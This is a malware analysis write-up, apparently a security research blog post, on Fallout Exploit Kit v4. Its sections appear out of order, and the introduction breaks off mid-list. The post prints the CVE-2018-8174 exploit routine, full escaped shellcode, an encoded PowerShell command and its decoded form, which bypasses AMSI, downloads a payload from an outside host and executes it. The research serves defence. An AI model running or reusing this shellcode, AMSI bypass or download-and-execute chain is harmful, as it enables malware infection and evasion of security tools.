value="/24_02_1964/05_04_1933/3410-Skegger-12666" /> <param name="quality" value="high" /> <param name="bgcolor" value="#ffffff" /> <param name="play" value="true" /> <param name="loop" value="true" /> <param name="wmode" value="window" /> <param name="scale" value="showall" /> <param name="menu" value="false" /> <param name="devicefont" value="false" /> <param name="salign" value="" /> <param name="allowScriptAccess" value="sameDomain" /></object></div> </body> </html> Thus, the swf file that exploits CVE-2018-15982 is read and executed. CVE-2018-8174 The exploit code used is very similar to PoC. Sub StartExploit UAF InitObjects vb_adrr=LeakVBAddr() vbs_base=GetBaseByDOSmodeSearch(GetUint32(vb_adrr)) msv_base=GetBaseFromImport(vbs_base,"msvcrt.dll") krb_base=GetBaseFromImport(msv_base,"kernelbase.dll") ntd_base=GetBaseFromImport(msv_base,"ntdll.dll") VirtualProtectAddr=GetProcAddr(krb_base,"VirtualProtect") NtContinueAddr=GetProcAddr(ntd_base,"NtContinue") SetMemValue GetShellcode() ShellcodeAddr=GetMemValue()+8 SetMemValue WrapShellcodeWithNtContinueContext(ShellcodeAddr) lIlll=GetMemValue()+69596 SetMemValue ExpandWithVirtualProtect(lIlll) llIIll=GetMemValue() ExecuteShellcode End Sub StartExploit The process to generate shellcode is like this. Function GetShellcode() IIlI=Unescape("%u0000%u0000%u0000%u0000") &Unescape("%u8B55%u83EC%uF8E4%uEC81%u00CC%u0000%u5653%uE857%u08B0%u0000%uF08B%u44C7%u1824%u05CD%u5379%u848D%uB024%u0000%u8900%u2474%u8934%u2444%u8D14%u2454%u8D10%u2444%uC744%u2444%u1D1C%u2BDE%u8982%u2444%u8D10%u244C%u8D14%u2484%u0094%u0000%u4489%u2824%u448D%u1824%u8D50%u2444%u502C%u1EE8%u0006%u8B00%u245C%u8D18%u244C%u8B18%u247C%u8B1C%u8903%u2444%u8B40%u1C47%u4489%u4424%u478B%u8920%u2444%u3348%u89C0%u2444%u8918%u2444%u891C%u2444%uE834%u02E9%u0000%u548D%u1C24%uCF8B%u66E8%u0002%u8300%u2464%u0038%u4C8D%u2024%u406A%uE856%u02FE%u0000%uC683%u8D40%u244C%u6828%u0080%u0000%uE856%u02EC%u0000%u74FF%u2C24%u4C8B%u5024%u448D%u4824%u74FF%u2C24%uD68B%u74FF%u4824%u5753%u8D50%u2444%u5060%u448D%u4C24%uE850%u0389%u0000%uDB33%uC483%u3938%u245C%u742C%u8B41%u2474%u8D38%u2444%u6A48%u5F44%u5357%uFF50%u83D6%u0CC4%u7C89%u4824%u448D%u1824%u106A%u5053%uD6FF%uC483%u8D0C%u2444%u5018%u448D%u4C24%u5350%u6853%u0000%u0800%u5353%uFF53%u2474%u5350%u54FF%u6424%uFF53%u2454%u5F44%u5B5E%uE58B%uC35D%u8B55%u83EC%u0CEC%u458B%u890C%uF445%u458B%u8908%uF845%u6583%u00FC%u07EB%u458B%u40FC%u4589%u8BFC%uFC45%u453B%u7310%u8B12%uF845%u4503%u8BFC%uF44D%u4D03%u8AFC%u8809%uEB08%uC9DF%u55C3%uEC8B%u458B%u0F08%u00BE%uC085%u2D74%u458B%u0F08%u00BE%uF883%u7C41%u8B19%u0845%uBE0F%u8300%u5AF8%u0E7F%u458B%u0F08%u00BE%uC083%u8B20%u084D%u0188%u458B%u4008%u4589%uEB08%u5DC9%u55C3%uEC8B%u8B51%u0845%u4589%uEBFC%u8B07%uFC45%u8940%uFC45%u458B%u0FFC%u00BE%uC085%u0274%uEDEB%u458B%u2BFC%u0845%uC3C9%u5653%u8B57%u33D9%u53FF%u3347%uE8F6%uFFC9%uFFFF%u8B59%u85C8%u74C9%u0F24%u03B6%uD233%uC703%uF1BF%u00FF%uF700%u43F7%uFA8B%uD233%u048D%uBE3E%uFFF1%u0000%uF6F7%uF28B%uE983%u7501%uC1DC%u10E6%u048D%u5F37%u5B5E%u55C3%uEC8B%uEC83%u5310%u5756%uF98B%u5589%u33FC%u8BF6%u3C47%u5C8B%u7838%uDF03%u438B%u8B1C%u204B%uC703%u4589%u03F0%u8BCF%u2443%uC703%u4D89%u89F8%uF445%u7339%u7618%u8B18%uB10C%uCF03%u7BE8%uFFFF%u3BFF%uFC45%u1074%u4D8B%u46F8%u733B%u7218%u33E8%u5FC0%u5B5E%uC3C9%u458B%u8BF4%uF04D%uB70F%u7004%u048B%u0381%uEBC7%u64EA%u30A1%u0000%u8B00%u0C40%u408B%u8B14%u8B00%u8B00%u1040%u64C3%u30A1%u0000%u8B00%u0C40%u408B%u8B14%u8B00%u1040%u56C3%u8B57%u8BF9%u56F2%u078B%uD0FF%uC085%u0675%u478B%u5604%uD0FF%u5E5F%u56C3%uF18B%uE856%uFEAB%uFFFF%u8B59%uE8CE%uFF06%uFFFF%u3D5E%u06DE%u3F54%u1F74%u413D%uCD05%u7425%u3D18%u0309%u0F05%u1174%uEC3D%u1803%u7416%u3D0A%u044B%u19F3%u0374%uC033%u33C3%u40C0%u55C3%uEC8B%uEC81%u013C%u0000%u418B%u5308%u5756%uFA8B%uDB33%u518B%u890C%uF855%u518B%u8B10%u1449%u6A53%u8902%uFC55%u4D89%uFFF4%u8BD0%u83F0%uFFFE%u4074%u858D%uFEC8%uFFFF%u85C7%uFEC8%uFFFF%u0128%u0000%u5650%u55FF%u85F8%u74C0%u8D27%uEC8D%uFFFE%uE8FF%uFF6F%uFFFF%uC085%u1575%u858D%uFEC8%uFFFF%u5650%u55FF%u85FC%u75C0%u56E2%u55FF%uEBF4%u3303%u43DB%u1F89%u5E5F%uC95B%u55C3%uEC8B%uEC83%u5310%u5756%uC033%uF98B%u3340%u53C9%uA20F%uF38B%u8D5B%uF05D%u0389%u7389%u8904%u084B%u5389%u8B0C%uF845%uE8C1%u891F%u5F07%u5B5E%uC3C9%u8B55%u81EC%u04EC%u0001%u5300%u3356%u57F6%uC68B%u8488%uFC05%uFFFE%u40FF%u003D%u0001%u7200%u8BF1%u8BDE%u8BFE%u8AF1%u3D94%uFEFC%uFFFF%uC78B%uE083%u0F07%uCAB6%uB60F%u3004%uC303%uC803%uB60F%u8AD9%u1D84%uFEFC%uFFFF%u8488%uFC3D%uFFFE%u47FF%u9488%uFC1D%uFFFE%u81FF%u00FF%u0001%u7200%u8BC8%u0C7D%uF633%uDE8B%uFF85%u5574%u458B%u8908%u0C45%u438D%u0F01%uD8B6%u948A%uFC1D%uFFFE%u0FFF%uC2B6%uC603%uB60F%u8AF0%u3584%uFEFC%uFFFF%u8488%uFC1D%uFFFE%u88FF%u3594%uFEFC%uFFFF%uB60F%u1D8C%uFEFC%uFFFF%uB60F%u03C2%u8BC8%u0C45%uB60F%u8AC9%u0D8C%uFEFC%uFFFF%u0830%u8940%u0C45%uEF83%u7501%u8BB1%u0845%u5E5F%uC95B%u55C3%uEC8B%uEC83%u8B48%u1C45%u4D89%u53F4%u8B56%u8B08%u0870%u4D89%u8BF8%u0448%u4D89%u8BF0%u0C48%u4D89%u8BE8%u1048%u4D89%u8BE0%u1448%u4D89%u8BD8%u1848%u458B%u5714%u046A%u5589%u8BEC%u1850%u4D89%u8BC8%u2448%u458B%u6818%u1000%u0000%u046A%u006A%u388B%u5589%u89D4%uFC4D%u7D89%uFFD0%u6AD2%u8B04%u6AD8%u5300%u5D89%uFFE4%u83D7%u207D%u8D00%u1445%u046A%u5350%u1875%u7D83%u0024%u0975%u45C7%uC614%u90EA%uEB2A%uC71D%u1445%uF9D7%u2A90%u14EB%u7D83%u0024%u45C7%uD214%u90EB%u752A%uC707%u1445%uE4D2%u2A90%u29E8%uFFFC%u8BFF%u084D%u458D%u83C0%u0CC4%u45C7%uF4C0%uDBBC%uC770%uC445%uE14D%u1989%u086A%uE850%uFE76%uFFFF%u5959%uDB33%u458D%u53C0%u5353%u5053%u55FF%u8BF8%u85F8%u75FF%u8B0A%u1045%u1889%u23E9%u0001%u5300%u6A53%u5303%u6853%u01BB%u0000%u75FF%u57F4%u55FF%u8BF0%u89D8%u145D%uDB85%u840F%u00FB%u0000%u4D8B%u8D08%uB845%u086A%uC750%uB845%uC6E5%u1DB0%u45C7%u7CBC%uB9D1%uE819%uFE1C%uFFFF%u5959%uC033%u6850%u3000%u8080%u5050%uFF50%uEC75%u458D%u50B8%uFF53%uE855%uD88B%uDB85%u840F%u00B8%u0000%u046A%u75FF%u6AE4%u6A00%u5300%u55FF%u85E0%u0FC0%uA084%u0000%u8300%u1C65%u8D00%uDC45%u6583%u00DC%u8D50%u1845%u45C7%u0418%u0000%u5000%u458D%u501C%u0568%u0000%u5320%u55FF%u83D8%u187D%u7400%u8376%u1C7D%u7400%u6A70%u6804%u1000%u0000%u75FF%u6A1C%uFF00%uD455%u75FF%u8B1C%u0C4D%u006A%u8950%uFF01%uD055%u6583%u00CC%u458D%u50CC%u458B%uFF0C%u1C75%u30FF%uFF53%uC855%uFF53%uFFD6%u1475%uD6FF%uFF57%u83D6%u207D%u8B00%uFC75%u0474%u006A%uD6FF%u7D83%u0024%u0474%u006A%uD6FF%u458B%uFF0C%u1C75%u4D8B%uFF08%uE830%uFD52%uFFFF%u458B%u5910%uC759%u0100%u0000%uEB00%u5311%uD6FF%u75FF%uFF14%u57D6%uD6FF%u458B%u8310%u0020%u5E5F%uC95B%u55C3%uEC8B%uEC83%u5310%u8B56%u8BF1%u57DA%u7589%uE8FC%uFBF7%uFFFF%uF88B%u43BA%u1C04%u8B19%uE8CF%uFB83%uFFFF%u368B%u75BA%uB905%u8B28%u89CF%u1446%u72E8%uFFFB%u8BFF%uFC75%u51BA%u3209%u8B73%u890E%u1C41%uCF8B%u5EE8%uFFFB%u8BFF%uBA0E%u0614%u33F5%u4189%u8B08%uE8CF%uFB4D%uFFFF%u0E8B%u97BA%u8104%u891D%u8B01%uE8CF%uFB3D%uFFFF%u0E8B%u4DBA%u8505%u8927%u0441%uCF8B%u2CE8%uFFFB%u8BFF%uBA0E%u04E4%u2259%u4189%u8B0C%uE8CF%uFB1B%uFFFF%u0E8B%uD3BA%u7004%u891F%u1041%uCF8B%u0AE8%uFFFB%u8BFF%uBA0E%u047A%u1A1E%u4189%u8B18%uE8CF%uFAF9%uFFFF%u0E8B%uF3BA%u8503%u8915%u2041%uCF8B%uE8E8%uFFFA%u8BFF%u890E%u2441%u58E8%uFFFB%uBAFF%u028C%u08D8%uC88B%uD2E8%uFFFA%u8BFF%u6A0B%u890C%u8D01%uF045%u4D8B%u500C%u45C7%uC2F0%u8DE0%uC720%uF445%uB412%u37CD%u45C7%uEFF8%uF16B%uE8A4%uFC34%uFFFF%u5959%u0E8B%u558D%uE8F0%uFB2B%uFFFF%uF88B%u5DBA%u1006%u8B36%uE8CF%uFA91%uFFFF%u758B%uBA08%u0584%u29FB%u0E8B%u4189%u8B0C%uE8CF%uFA7D%uFFFF%u0E8B%u55BA%uC706%u8935%u1441%uCF8B%u6CE8%uFFFA%u8BFF%uBA0E%u078C%u4B92%u4189%u8B10%uE8CF%uFA5B%uFFFF%u0E8B%u55BA%u6406%u8936%u0841%uCF8B%u4AE8%uFFFA%u8BFF%uBA0E%u051D%u245C%u4189%u8B04%uE8CF%uFA39%uFFFF%u0E8B%u46BA%uC006%u8935%u8B01%uE8CF%uFA29%uFFFF%u0E8B%u5E5F%u895B%u1841%uC3C9%uECD7%u2182%uA319%u2DD6%u29FE%uCBFE%u5CE9%uB27D%u501A%uCF26%u6A47%u54FE%uDABA%u8A85%uEF83%u3361%u09D1%u20F7%u16EC%uD9B7%u917A%uDE1A%u2281%uEA7F%u3143%u6ACE%u1A52%u4FF4%u500B%uC276%u5A57%uC1F8%uE09A%u258F%uA209%u6BCD%u28EE%uE3E7%u2FD5%u8D28%u3568%uAE4A%u0623%u309B%u8E87%uE4E0%u8EF7%u5F02%u7AB4%u73DA%u7483%uB0D2%uBC0E%uB049%u40EE%u8610%u7665%u07AF%u7330%u3C80%u6436%uF745%u5A61%uC1F8%uBBE2%u5581%uF71D%u00A7%u7F8D%u4907%u11AF%uB565%uF4E6%u755E%u19EE%u23AF%u8DB6%uEB89%u2838%u11BF%uC109%u1219%uD17E%uBEEA%uDD49%uF759%u09D6%uEA08%u8E45%uB602%u1B93%u19C4%u9146%uB94D%u9E6C%u0BC7%u00E8%u0000%u5800%uE883%u2D05%u00C0%u0000%u00C3" &lIIII(IIIII(""))) IIlI=IIlI & String((&h80000-LenB(IIlI))/2,Unescape("%u4141")) GetShellcode=IIlI End Function Let’s read shellcode. Shellcode The decoding algorithm in the shellcode has not changed from v3 and remains RC4. Analysis of Fallout Exploit Kit v3 The hash algorithm of API hash has not changed either. API hashed by the dualaccModFFF1Hash algorithm. unsigned int __thiscall dualaccModFFF1Hash(unsigned __int8 *this) { unsigned __int8 *v1; // ebx int v2; // edi unsigned int v3; // esi int i; // ecx unsigned int v5; // edx v1 = this; v2 = 1; v3 = 0; for ( i = zz_count(this); i; --i ) { v5 = (v2 + (unsigned int)*v1++) % 0xFFF1; v2 = v5; v3 = (v3 + v5) % 0xFFF1; } return v2 + (v3 << 16); } However, there were interesting changes. Analysis environment detection codes has been added in shellcode. VM Detection Query hypervisor precense using CPUID. unsigned int __thiscall zz_vm_detect(unsigned int *this) { unsigned int *v1; // edi unsigned int result; // eax v1 = this; _EAX = 1; __asm { cpuid } result = _ECX >> 31; *v1 = _ECX >> 31; return result; } Process Detection Get a list of running processes. Convert process name to lower case. int __cdecl zz_tolowercase(_BYTE *a1) { int result; // eax while ( 1 ) { result = (char)*a1; if ( !*a1 ) break; if ( (char)*a1 >= 65 && (char)*a1 <= 90 ) *a1 += 32; ++a1; } return result; } Compare to the following hashes. Once again, It uses the dualaccModFFF1Hash algorithm. 0x3F5406DE 0x25CD0541 0x0F050309 0x161803EC 0x19F3044B Two process names were identified. I do not know the others. >>> hex(dualaccModFFF1Hash("wireshark.exe")) '0x25cd0541' >>> hex(dualaccModFFF1Hash("fiddler.exe")) '0x19f3044b' Like v3, shellcode downloads, decodes and executes encrypted PowerShell code. PowerShell The PowerShell code to be executed is like this. powershell.exe -w hidden -noni -enc dAByAHkAewAkAGwAMQBJAGwAMQA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQA7ACQAbAAxAEkAbAAxAGwASQAxAEkASQBsAD0AJABsADEASQBsADEALgBHAGUAdABUAHkAcABlACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAFUAMwBsAHoAZABHAFYAdABMAGsAMQBoAGIAbQBGAG4AWgBXADEAbABiAG4AUQB1AFEAWABWADAAYgAyADEAaABkAEcAbAB2AGIAaQA1AEIAYgBYAE4AcABWAFgAUgBwAGIASABNAD0AJwApACkAKQA7ACQASQAxAEkAbAAxADEAbAAxAEkAbAA9ACQAbAAxAEkAbAAxAGwASQAxAEkASQBsAC4ARwBlAHQARgBpAGUAbABkACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAFkAVwAxAHoAYQBVAGwAdQBhAFgAUgBHAFkAVwBsAHMAWgBXAFEAPQAnACkAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAkAEkAMQBJAGwAMQAxAGwAMQBJAGwALgBTAGUAdABWAGEAbAB1AGUAKAAkAG4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AH0AYwBhAHQAYwBoAHsAfQA7AEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAIgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzADsAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwBbAFMAdAByAHUAYwB0AEwAYQB5AG8AdQB0ACgATABhAHkAbwB1AHQASwBpAG4AZAAuAFMAZQBxAHUAZQBuAHQAaQBhAGwAKQBdAHAAdQBiAGwAaQBjACAAcwB0AHIAdQBjAHQAIABJADEAbABJAEkAMQBJAGwAMQB7AHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABJAEkAbABJADEAOwBwAHUAYgBsAGkAYwAgAEkAbgB0AFAAdAByACAAbABJAGwAMQBJADEASQBJADEAbAA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAEkASQBJAEkASQBsAEkASQA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAEkAbAAxADEAMQBsAEkAbAAxAEkAMQBJADsAfQBbAFMAdAByAHUAYwB0AEwAYQB5AG8AdQB0ACgATABhAHkAbwB1AHQASwBpAG4AZAAuAFMAZQBxAHUAZQBuAHQAaQBhAGwALABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAFUAbgBpAGMAbwBkAGUAKQBdAHAAdQBiAGwAaQBjACAAcwB0AHIAdQBjAHQAIABsAEkAMQBsAGwAMQBJAGwAMQBJADEAbAB7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAEkASQBJAGwASQA7AHAAdQBiAGwAaQBjACAAcwB0AHIAaQBuAGcAIABJAGwAMQBsADEAOwBwAHUAYgBsAGkAYwAgAHMAdAByAGkAbgBnACAAbABJADEAbABsADsAcAB1AGIAbABpAGMAIABzAHQAcgBpAG4AZwAgAEkAbAAxADEAMQBJAEkASQBsADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAASQAxAGwASQBsADEAbABsADEASQA7AHAAdQBiAGwAaQBjACAAdQBpAG4AdAAgAEkAbABJAEkASQBsADEAOwBwAHUAYgBsAGkAYwAgAHUAaQBuAHQAIABsAGwAMQAxAEkAbABsADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAASQBsADEASQBsAEkAbAAxADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAAbABJAGwASQBJAEkAOwBwAHUAYgBsAGkAYwAgAHUAaQBuAHQAIABsAEkAMQBsAEkAbABJADsAcAB1AGIAbABpAGMAIAB1AGkAbgB0ACAAbABJADEAbAAxADEAOwBwAHUAYgBsAGkAYwAgAHUAaQBuAHQAIABJAGwAbAAxAEkAbAA7AHAAdQBiAGwAaQBjACAAcwBoAG8AcgB0ACAASQBsAEkASQAxADsAcAB1AGIAbABpAGMAIABzAGgAbwByAHQAIABJAGwAbABJAGwAbAA7AHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABsAGwASQBsAEkAbABJAGwASQA7AHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABJAGwAbAAxAEkAbABJAGwASQA7AHAAdQBiAGwAaQBjACAASQBuAHQAUAB0AHIAIABJAGwAbABJAGwAbABsAEkAMQBJADEAOwBwAHUAYgBsAGkAYwAgAEkAbgB0AFAAdAByACAASQAxAEkASQBJADsAfQA7AHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABsADEASQBsADEAMQBJAEkASQB7AFsARABsAGwASQBtAHAAbwByAHQAKAAiACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAiACwAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABiAG8AbwBsACAAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAoAHMAdAByAGkAbgBnACAASQBJAGwASQBJAEkALABzAHQAcgBpAG4AZwAgAEkAbABJAGwASQAsAEkAbgB0AFAAdAByACAASQAxADEAbAAxAEkALABJAG4AdABQAHQAcgAgAGwAMQBsAEkAMQAsAGIAbwBvAGwAIABJAGwASQAxADEASQBJADEAMQAxADEALAB1AGkAbgB0ACAAbAAxADEAMQBJACwASQBuAHQAUAB0AHIAIABsAEkASQBJADEASQBsAGwASQAsAHMAdAByAGkAbgBnACAASQAxAEkAbAAxAGwASQAsAHIAZQBmACAAbABJADEAbABsADEASQBsADEASQAxAGwAIABsAGwAMQAxAEkASQBsADEASQAsAG8AdQB0ACAASQAxAGwASQBJADEASQBsADEAIABsAEkASQAxAEkASQApADsAfQAiADsAJABsAGwAbAAxAEkAbABsAEkAMQA9ACIAJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwATABvAHcAXAAkACgALQBqAG8AaQBuACgAKAA0ADgALgAuADUANwApACsAKAA2ADUALgAuADkAMAApACsAKAA5ADcALgAuADEAMgAyACkAfABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBDAG8AdQBuAHQAIAA4AHwAJQB7AFsAYwBoAGEAcgBdACQAXwB9ACkAKQAuAHQAbQBwACIAOwAkAEkAMQBsADEAMQBJADEAPQAnAGgAdAB0AHAAOgAvAC8AYgBlAGEAaABlAHIAbwA0AHUALgBjAG8AbQAvADEAOQA1ADAALQAwADEALQAxADEALwBPADgAWgByACcAOwBbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcASgBHAE4AcwBhAFQAMABvAFQAbQBWADMATABVADkAaQBhAG0AVgBqAGQAQwBCAE8AWgBYAFEAdQBWADIAVgBpAFEAMgB4AHAAWgBXADUAMABLAFQAcwBrAFkAMgB4AHAATABrAGgAbABZAFcAUgBsAGMAbgBOAGIASgAxAFYAegBaAFgASQB0AFEAVwBkAGwAYgBuAFEAbgBYAFQAMABuAFMAagBVADMAVQBEAGwANQBNAFcAawB6AE0ARQAwAHgATQBEAEoAWQBOAFMAYwA3AEoARwBOAHMAYQBTADUARQBiADMAZAB1AGIARwA5AGgAWgBFAFoAcABiAEcAVQBvAEoARQBrAHgAYgBEAEUAeABTAFQARQBzAEoARwB4AHMAYgBEAEYASgBiAEcAeABKAE0AUwBrADcAJwApACkAfABpAGUAeAA7ACQASQAxAEkAMQBsADEASQBJAGwAbABJADEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAbABJADEAbABsADEASQBsADEASQAxAGwAOwAkAEkAMQBJADEAbAAxAEkASQBsAGwASQAxAC4ASQBsAEkASQAxAD0AMAB4ADAAOwAkAEkAMQBJADEAbAAxAEkASQBsAGwASQAxAC4ASQBJAEkAbABJAD0AWwBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwAuAE0AYQByAHMAaABhAGwAXQA6ADoAUwBpAHoAZQBPAGYAKAAkAEkAMQBJADEAbAAxAEkASQBsAGwASQAxACkAOwAkAEkASQBsADEASQBsADEASQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJADEAbABJAEkAMQBJAGwAMQA7AFsAbAAxAEkAbAAxADEASQBJAEkAXQA6ADoAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAoACQAbABsAGwAMQBJAGwAbABJADEALAAkAGwAbABsADEASQBsAGwASQAxACwAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACwAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACwAJABmAGEAbABzAGUALAAwAHgAMAAwADAAMAAwADAAMAA4ACwAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACwAIgBjADoAIgAsAFsAcgBlAGYAXQAkAEkAMQBJADEAbAAxAEkASQBsAGwASQAxACwAWwByAGUAZgBdACQASQBJAGwAMQBJAGwAMQBJACkAfABvAHUAdAAtAG4AdQBsAGwAOwA= Let’s decode and clean. try { $l1Il1 = [Ref].Assembly; $l1Il1lI1IIl = $l1Il1.GetType("System.Management.Automation.AmsiUtils"); $I1Il11l1Il = $l1Il1lI1IIl.GetField("amsiInitFailed", 'NonPublic,Static'); $I1Il11l1Il.SetValue($null, $true); } catch { }; Add-Type -TypeDefinition "using System;using System.Diagnostics;using System.Runtime.InteropServices;[StructLayout(LayoutKind.Sequential)]public struct I1lII1Il1{public IntPtr IIlI1;public IntPtr lIl1I1II1l;public uint IIIIIlII;public uint Il111lIl1I1I;}[StructLayout(LayoutKind.Sequential,CharSet=CharSet.Unicode)]public struct lI1ll1Il1I1l{public uint IIIlI;public string Il1l1;public string lI1ll;public string Il111IIIl;public uint I1lIl1ll1I;public uint IlIIIl1;public uint ll11Ill;public uint Il1IlIl1;public uint lIlIII;public uint lI1lIlI;public uint lI1l11;public uint Ill1Il;public short IlII1;public short IllIll;public IntPtr llIlIlIlI;public IntPtr Ill1IlIlI;public IntPtr IllIlllI1I1;public IntPtr I1III;};public static class l1Il11III{[DllImport(""kernel32.dll"",SetLastError=true)]public static extern bool CreateProcess(string IIlIII,string IlIlI,IntPtr I11l1I,IntPtr l1lI1,bool IlI11II1111,uint l111I,IntPtr lIII1IllI,string I1Il1lI,ref lI1ll1Il1I1l ll11IIl1I,out I1lII1Il1 lII1II);}"; $lll1IllI1 = "$env:userprofile\AppData\LocalLow\$(-join((48..57)+(65..90)+(97..122)|Get-Random -Count 8|%{[char]$_})).tmp"; $I1l11I1 = 'http://beahero4u.com/1950-01-11/O8Zr'; $cli = (New-Object Net.WebClient); $cli.Headers['User-Agent'] = 'J57P9y1i30M102X5'; $cli.DownloadFile($I1l11I1, $lll1IllI1); $I1I1l1IIllI1 = New-Object lI1ll1Il1I1l; $I1I1l1IIllI1.IlII1 = 0x0; $I1I1l1IIllI1.IIIlI = [System.Runtime.InteropServices.Marshal]::SizeOf($I1I1l1IIllI1); $IIl1Il1I = New-Object I1lII1Il1; [l1Il11III]::CreateProcess($lll1IllI1, $lll1IllI1, [IntPtr]::Zero, [IntPtr]::Zero, $false, 0x00000008, [IntPtr]::Zero, "c:", [ref]$I1I1l1IIllI1, [ref]$IIl1Il1I) | out-null; Thus the malware is downloaded and executed. Conclusion Fallout has been heavily updated, making analysis very difficult. Very sophisticated techniques such as Diffie-Hellman key exchange, VM detection, process detection, etc. are used. We need to be careful as they may be updated in the future.

<h2 id="first">First</h2> We have been observing the Fallout Exploit Kit since August 2018. Fallout is using non-characteristic URL and heavily obfuscated landing page. The user still exists and attacks are observed daily. Recently, we were investigating an attack campaign that infects Raccoon Stealer in the flow of PopAds-> KeitaroTDS-> Fallout. About Fallout, we have already written three reports. The first one was about the emergence of Fallout, the second one was to start using PowerShell and the third one was to start exploiting PoC on GitHub. We divide these major changes by version and call them v1~3. <ul> <li><a href="https://nao-sec.org/2018/09/hello-fallout-exploit-kit.html">Hello “Fallout Exploit Kit”</a></li> <li><a href="https://nao-sec.org/2019/01/in-depth-analysis-of-new-fallout.html">In-Depth analysis of new Fallout Exploit Kit</a></li> <li><a href="https://nao-sec.org/2019/03/analysis-of-fallout-exploit-kit-v3.html">Analysis of Fallout Exploit Kit v3</a></li> </ul> We wrote about v3 in March 2019. v3 is not stable and has been updated to the next version immediately. @EKFiddle (created and maintained by @jeromesegura) reported this change on April 11. <blockquote class="twitter-tweet" data-lang="ja"><a href="https://twitter.com/hashtag/EKFiddle?src=hash&ref_src=twsrc%5Etfw">#EKFiddle</a> [Regex update]: <a href="https://twitter.com/hashtag/FalloutEK?src=hash&ref_src=twsrc%5Etfw">#FalloutEK</a> Seems like there is no more use of the PoC on GitHub for CVE-2018-8174. Pushing <a href="https://twitter.com/hashtag/GandCrab?src=hash&ref_src=twsrc%5Etfw">#GandCrab</a> in this particular instance.<a href="https://t.co/U67qZosp1e">https://t.co/U67qZosp1e</a> <a href="https://t.co/buVTakYuhJ">pic.twitter.com/buVTakYuhJ</a>— EKFiddle (@EKFiddle) <a href="https://twitter.com/EKFiddle/status/1116134534989238272?ref_src=twsrc%5Etfw">2019年4月11日</a></blockquote> <script async="" src="https://platform.twitter.com/widgets.js" charset="utf-8"></script> We call this a big update v4 (it is still v4). Detailed analysis report has not been written about what kind of update Fallout has done. However, this update is very big. At least for us (Exploit Kit analyst), that made the analysis very cumbersome. Fallout v4 incorporates the following features. <div class="language-md highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1. Diffie-Hellman key exchange 2. VM detection 3. Process detection </code></pre></div></div> Here, we will share detailed analysis results on the updates made by Fallout v4. But unfortunately, we did not understand everything. If you are aware of it, please help us. <h2 id="traffic-chain">Traffic chain</h2> First, let’s look at the previous traffic chain. v1~3 was like this. <img src="https://4.bp.blogspot.com/-eXpYD_rUFwU/W4loVPM1TTI/AAAAAAAAAVI/XuE3p36q7QMAVw95gBYPkKOA-IhsdaoAQCLcBGAs/s1600/0.png" alt="" /> <img src="https://3.bp.blogspot.com/-_qnvJOfIOeE/XEiKt9Zs16I/AAAAAAAAAYI/tspkgYcwxe0YjeGhaTGofsUBpfmhjJzmwCLcBGAs/s1600/0.png" alt="" /> <img src="https://nao-sec.org/assets/2019-03-07/01.png" alt="" /> In v3, it acquired PoC of CVE-2018-8174 from GitHub, and attacked by rewriting the part of shellcode. So what kind of traffic chain is v4? <img src="https://nao-sec.org/assets/2019-07-09/01.png" alt="" /> <div class="language-md highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1. Landing Page 2. JavaScript Code 3. Encoded Code 1 4. Encoded Code 2 